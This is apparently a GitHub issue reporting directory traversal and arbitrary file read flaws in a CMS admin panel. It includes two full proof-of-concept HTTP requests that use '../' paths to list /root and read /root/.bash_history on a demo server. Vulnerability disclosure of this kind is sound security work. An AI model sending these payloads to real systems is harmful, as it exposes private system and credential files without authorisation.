There is a "Directory Traversal" and "Arbitrary file read" vulnerability that can read system dir and file
jearyorg opened this issue · 1 comments
jearyorg commented
First you should login demo account,
Directory Traversal POC:
GET /admin/cmsWebFile/list.html?path=../../../../../root&_=1529029023591 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close
Arbitrary file read POC:
GET /admin/cmsTemplate/content.html?path=../../../../../../../../../root/.bash_history&_=1529029023587 HTTP/1.1
Host: cms.publiccms.com
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Referer: http://cms.publiccms.com/admin/
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: **
Connection: close
You can use these two poc brower system dir and read any file~